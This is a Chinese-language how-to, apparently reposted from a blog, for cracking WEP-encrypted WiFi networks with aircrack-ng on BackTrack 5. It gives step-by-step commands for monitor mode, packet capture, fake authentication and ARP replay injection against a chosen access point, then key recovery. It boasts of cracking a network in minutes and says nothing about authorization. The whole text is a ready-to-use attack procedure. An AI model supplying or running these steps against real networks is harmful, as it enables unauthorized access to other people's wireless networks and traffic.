WIFI破解--aircrack-ng

WIFI破解--aircrack-ng

官方网站:

另请上网查阅gui前端spoonweb的相关说明

工具

1.BackTrack 5 光盘版或者虚拟机镜像, 也可以是Backtrack5 U盘版 
2.一个兼容Backtrack的无线网卡 
3.使用WEP加密的无线网络


操作步骤

1) ifconfig -a 
(可以查看到自己机子无线网卡的MAC地址和无线网卡的设备名称), 保留这个窗口方便下几步查看需要的信息, 打开新命令窗口进入一步)


2) airmon-ng start wlan0 2 
(wlan0为无线网卡, 2为需要监听的频道, 根据自己情况输入, 此步骤为打开无线网卡的监听模式)


3) airodump-ng –ivs -w name -c 2 wlan0 
(获取频道2的所有无线AP的信息, wlan0是无线网卡, 2为频道, 这一步的频道需要跟上一步的一致, 命令输入后会显示周围所有频道为*的无线AP, 
显示的列表: 
BSSID : 无线AP的Mac 地址 
PWR: AP信号的大小 
RXQ: 干扰值 
Beacons:发送和接受的数据包, 有数据传输的时候就会跳动 
#Data: 数据, 破解需要的最关键的就是这个 
CH:频道 
MB:网络连接速度 
ESSID: AP的名称 
保留这一窗口, 打开新的命令窗口进入下一步)


4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX wlan0 
(发送欺骗, ap_essid为AP的名称, 例如Linksys或者TP-Link, ap_mac为AP的MAC地址, 第三步的BSSID就是AP的MAC地址, XXXXXXXXX为自己无线网卡的MAC地址, 第一步可以看到. 这一步成功后会显示Successful, 如不成功需要在信号强的地方重试, 成功后才可以进入下一步)


5) aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 wlan0 
(ap_mac为无线AP的mac地址, 具体看步骤3, XXXXXXXX为无线网卡的mac地址, wlan0为网卡, 这一步执行以后, 开始正确的收发数据包, #Data开始上涨)


6) aircrack-ng -n 64 -b ap_mac name-*.ivs 
(开始破解, ap_mac为ap的mac地址, 64指的是使用了64位加密, 多次破解失败的话可以试128)

多数情况下当#data开始迅速跳动的时候就可以开始破解了, 不需要等到多少包, 如果#data这个数据增长缓慢的话, 换个位置到无线信号强的地方再试, 命令输入正确的话最快3分钟搞定一个64位加密的WEP AP是没问题的! e网软摘测试时用的USB网卡, 如果使用内置无线网卡性能上会提升很多.

原文地址:https://www.cnblogs.com/lixuebin/p/10814336.html